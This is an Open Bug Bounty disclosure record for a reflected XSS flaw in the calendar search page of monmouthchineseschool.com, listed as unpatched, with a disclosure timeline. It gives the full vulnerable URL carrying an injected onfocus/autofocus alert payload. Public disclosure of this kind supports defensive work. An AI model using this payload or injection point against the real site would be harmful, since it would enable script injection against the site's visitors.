Lucene search

K
openbugbountySonnySpooksOBB:210206
HistoryJan 31, 2017 - 2:30 a.m.

monmouthchineseschool.com XSS vulnerability

2017-01-3102:30:00
SonnySpooks
www.openbugbounty.org
7
Vulnerable URL:
http://www.monmouthchineseschool.com/icalendar/search.php?cpath=&cal;=&getdate;=20160424&query;=666%22%20onfocus=%22alert(/XSSPOSED/)%22%20autofocus=%22&submit.x;=0&submit.y;=0
Details:
Description Value
Patched: No
Latest check for patch: 28.07.2017
Vulnerability type: XSS
Vulnerability status: Publicly disclosed
Alexa Rank Unknown / Not calculated
VIP website status: No
Check monmouthchineseschool.com SSL connection: (Grade: C+)
Coordinated Disclosure Timeline:
Description Value
Vulnerability submitted via Open Bug Bounty 31 January, 2017 02:30 GMT
Generic security notifications sent to website owner 31 January, 2017 02:33 GMT
Notification sent to subscribers (without technical details) 31 January, 2017 06:17 GMT
Vulnerability details disclosed by researcher 7 February, 2017 03:13 GMT